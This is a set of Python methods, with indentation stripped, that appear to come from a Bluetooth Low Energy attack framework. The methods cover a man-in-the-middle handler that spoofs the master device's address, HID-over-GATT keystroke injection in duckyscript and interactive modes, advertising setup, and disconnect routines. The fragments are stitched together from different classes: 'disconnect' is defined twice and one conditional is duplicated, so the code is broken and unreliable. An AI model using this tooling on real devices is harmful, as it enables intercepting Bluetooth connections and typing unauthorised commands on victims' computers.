def connect(self, packet):
if self.getStage() == BLEMitmStage.WAIT_CONNECTION:
io.success("Master connected : " + packet.srcAddr)
self.initiatorAddress = packet.srcAddr
self.initiatorAddressType = b"\x00" if packet.type == "public" else b"\x01"
if self.args["ADVERTISING_STRATEGY"] == "preconnect":
if utils.booleanArg(self.args["MASTER_SPOOFING"]):
self.a2sEmitter.sendp(ble.BLEDisconnect())
while self.a2sEmitter.isConnected():
utils.wait(seconds=0.01)
self.a2sEmitter.setAddress(packet.srcAddr,
random=packet.type == "random")
address = utils.addressArg(self.args["TARGET"])
connectionType = self.args["CONNECTION_TYPE"]
io.info("Connecting to slave " + address + "...")
self.a2sEmitter.sendp(
ble.BLEConnect(dstAddr=address,
type=connectionType,
initiatorType=packet.type))
while not self.a2sEmitter.isConnected():
utils.wait(seconds=0.01)
if self.args["ADVERTISING_STRATEGY"] == "flood":
if utils.booleanArg(self.args["MASTER_SPOOFING"]):
self.a2sEmitter.setAddress(packet.srcAddr,
random=packet.type == "random")
self.connectOnSlave(packet.type)
self.setStage(BLEMitmStage.ACTIVE_MITM)
io.info("Entering ACTIVE_MITM stage ...")
def onKey(self, key):
if key == "esc":
self.emitter.sendp(ble.BLEDisconnect())
return False
if self.mode in ("text", "duckyscript") and key.lower() == "space":
print(self.attackStream)
for o in self.attackStream:
print(o)
self.emitter.sendp(*self.attackStream)
if self.mode == "interactive":
if self.mode == "interactive":
injectedKeystroke = ""
if key == "space":
injectedKeystroke = " "
elif key == "delete":
injectedKeystroke = "DEL"
elif key in [
"enter", "shift", "alt", "ctrl", "backspace", "up",
"down", "left", "right", "f1", "f2", "f3", "f4", "f5",
"f6", "f7", "f8", "f9", "f10", "f11", "f12"
]:
injectedKeystroke = key.upper()
else:
injectedKeystroke = key
io.info("Injecting:" + str(injectedKeystroke))
self.emitter.sendp(*(self.addHIDoverGATTKeystroke(
key=injectedKeystroke, locale="fr")))
return False
def run(self):
interface = self.args["INTERFACE"]
self.emitter = self.getEmitter(interface=interface)
if self.checkCapabilities():
if self.emitter.isConnected():
self.emitter.sendp(ble.BLEDisconnect())
while self.emitter.isConnected():
utils.wait(seconds=0.01)
address = (self.emitter.getAddress()
if self.args["ADVERTISING_ADDRESS"] == "" else
utils.addressArg(self.args["ADVERTISING_ADDRESS"]))
if address != self.emitter.getAddress():
self.emitter.setAddress(address)
if utils.isHexadecimal(self.args["SCANNING_DATA"]):
scanningData = bytes.fromhex(self.args["SCANNING_DATA"])
else:
scanningData = b""
if utils.isHexadecimal(self.args["ADVERTISING_DATA"]):
advertisingData = bytes.fromhex(self.args["ADVERTISING_DATA"])
else:
advertisingData = b""
destAddress = ("00:00:00:00:00:00"
if self.args["DESTINATION_ADDRESS"] == "" else
utils.addressArg(self.args["DESTINATION_ADDRESS"]))
intervalMin = utils.integerArg(self.args["INTERVAL_MIN"])
intervalMax = utils.integerArg(self.args["INTERVAL_MAX"])
advertisingType = self.args["ADVERTISING_TYPE"].upper()
advertisingAddressType = "public" if self.args[
"ADVERTISING_ADDRESS_TYPE"].lower() == "public" else "random"
destinationAddressType = "public" if self.args[
"DESTINATION_ADDRESS_TYPE"].lower() == "public" else "random"
self.emitter.setScanningParameters(data=scanningData)
self.emitter.setAdvertisingParameters(
type=advertisingType,
destAddr=destAddress,
data=advertisingData,
intervalMin=intervalMin,
intervalMax=intervalMax,
daType=advertisingAddressType,
oaType=destinationAddressType)
self.emitter.setAdvertising(
enable=utils.booleanArg(self.args["ENABLE"]))
time = utils.integerArg(
self.args['TIME']) if self.args["TIME"] != "" else -1
while time != 0:
utils.wait(seconds=1)
time -= 1
return self.ok({"INTERFACE": self.args["INTERFACE"]})
else:
io.fail("Interface provided (" + str(self.args["INTERFACE"]) +
") is not able to send advertisements.")
return self.nok()
def disconnect(self):
if self.receiver.isConnected():
self.emitter.sendp(ble.BLEDisconnect())
utils.wait(seconds=1)
io.success("Disconnected !")
if self.receiver.isConnected():
self.updatePrompt(self.emitter.getCurrentConnection())
else:
self.updatePrompt()
else:
io.fail("No active connections !")
def disconnectMaster(self, packet):
io.info("Master disconnected !")
if self.a2sReceiver.isConnected():
self.a2sEmitter.sendp(ble.BLEDisconnect())
self.setStage(BLEMitmStage.STOP)
def disconnect(self):
if self.emitter.isConnected():
self.emitter.sendp(ble.BLEDisconnect())
self.updatePrompt()
def onPairingOK(self, pkt):
self.emitter.sendp(ble.BLEDisconnect())
